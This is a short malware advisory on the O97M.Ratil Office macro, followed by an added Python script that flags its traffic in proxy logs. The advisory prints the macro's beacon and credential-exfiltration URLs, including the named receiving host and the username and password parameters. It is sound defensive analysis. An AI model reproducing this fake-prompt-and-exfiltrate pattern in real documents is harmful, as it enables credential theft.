O97M.Ratil
First posted on 29 May 2014.
Source: Symantec
Aliases:
There are no other names known for O97M.Ratil.
Explanation:
The infected Microsoft Word and Microsoft Excel files contain macro code that sends a request to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL
It then displays a dialogue box asking for user credentials.
When the user clicks OK, the macro code sends the stolen credentials to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]SYNTA_PHARMA&uname=" & [USER NAME] & "&pword=" & [PASSWORD]
It then displays an image of a document from the Commonwealth of Massachusetts.
Last update 29 May 2014
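The two requests described above can be told apart in web proxy logs: the first shows only that the macro ran, while the second shows that the user submitted credentials that now need resetting. The following is an added example, not code from Symantec's write-up; the log layout, the `PLACEHOLDER?t=` text standing in for the `[REMOVED]` part of the URL, and the sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

HOST = "www.palmettogoodwill.org"   # host named in the write-up
PATH_PREFIX = "/files/report"       # the rest of the path is [REMOVED] on the page
PARAM_RE = re.compile(r"[?&](uname|pword)=([^&\s]*)")
RANK = {"macro_executed": 1, "credentials_sent": 2}

def classify(url):
    """Return 'macro_executed', 'credentials_sent', or None for one URL."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != HOST:
        return None
    if not parts.path.startswith(PATH_PREFIX):
        return None
    params = dict(PARAM_RE.findall(url))
    if set(params) != {"uname", "pword"}:
        return None
    # The first request carries the literal NULL in both fields.
    if params["uname"] == "NULL" and params["pword"] == "NULL":
        return "macro_executed"
    return "credentials_sent"

def triage(log_lines):
    """Map each client IP to the most severe verdict seen for it."""
    worst = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        verdict = classify(url)
        if verdict and RANK[verdict] > RANK.get(worst.get(client), 0):
            worst[client] = verdict
    return worst

# Constructed sample log, format assumed: "time client method url status".
# PLACEHOLDER and "?t=" stand in for [REMOVED]; the credentials are dummies.
BASE = "http://" + HOST + PATH_PREFIX + "PLACEHOLDER?t="
SAMPLE_LOG = [
    "2014-05-29T09:14:02Z 10.0.0.21 GET " + BASE + "MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL 200",
    "2014-05-29T09:14:40Z 10.0.0.21 GET " + BASE + "SYNTA_PHARMA&uname=jdoe&pword=EXAMPLE 200",
    "2014-05-29T09:20:11Z 10.0.0.37 GET " + BASE + "MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL 200",
    "2014-05-29T09:21:00Z 10.0.0.50 GET http://" + HOST + "/index.html 200",
]

if __name__ == "__main__":
    for client, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(client, verdict)
```

A client marked `credentials_sent` warrants a password reset for the affected account; one marked `macro_executed` opened the document but has no logged submission.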